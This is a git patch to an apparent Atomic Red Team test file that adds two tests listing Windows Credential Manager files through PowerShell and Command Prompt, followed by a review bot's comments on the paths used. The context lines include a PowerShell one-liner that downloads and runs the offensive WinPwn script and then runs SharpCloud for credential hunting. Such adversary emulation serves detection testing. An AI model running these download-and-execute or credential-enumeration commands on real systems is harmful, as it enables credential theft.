From 7c51b76bcde3c543a76dfb60ae1bd16c18dbc3a3 Mon Sep 17 00:00:00 2001
From: abhijose09
Date: Fri, 12 Jul 2024 20:28:48 +0530
Subject: [PATCH] Update T1552.001.yaml (#2842) * Update T1552.001.yaml New Test Added : List Credential Files via PowerShell * Update T1552.001.yaml Added Test List Credential Files via PowerShell , List Credential Files via Command Prompt * Updated command lines Updated command lines
---
 atomics/T1552.001/T1552.001.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml
index b8d3ebc8..1c93860d 100644
--- a/atomics/T1552.001/T1552.001.yaml
+++ b/atomics/T1552.001/T1552.001.yaml
@@ -162,3 +162,28 @@ atomic_tests:
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 SharpCloud -consoleoutput -noninteractive
 name: powershell
+- name: List Credential Files via PowerShell
+ description: |
+ Via PowerShell,list files where credentials are stored in Windows Credential Manager
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $usernameinfo = (Get-ChildItem Env:USERNAME).Value
+ Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
+ Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
+
+ name: powershell
+ elevation_required: true
+- name: List Credential Files via Command Prompt
+ description: |
+ Via Command Prompt,list files where credentials are stored in Windows Credential Manager
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
+ dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
+
+ name: command_prompt
+ elevation_required: true
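Review bot: Both new tests build the path as `C:\Users\<name>\AppData\...`, which assumes the profile lives under `C:\Users` and that its folder is named exactly like the account; on a host with a relocated or renamed profile the listing fails and the test produces no file-access telemetry, which can read as detection coverage that is not there. In the PowerShell test, `Get-ChildItem -Hidden $env:APPDATA\Microsoft\Credentials\` and `Get-ChildItem -Hidden $env:LOCALAPPDATA\Microsoft\Credentials\` resolve the real locations, and the Command Prompt test can use `%APPDATA%` and `%LOCALAPPDATA%` the same way. `elevation_required: true` also looks unnecessary, since both directories sit in the running user's own profile; if the elevated session runs as a different account the variables would point at that account's profile, so `false` seems the better fit unless there is a reason not visible here. The two `description` lines are missing a space after the comma ("Via PowerShell,list").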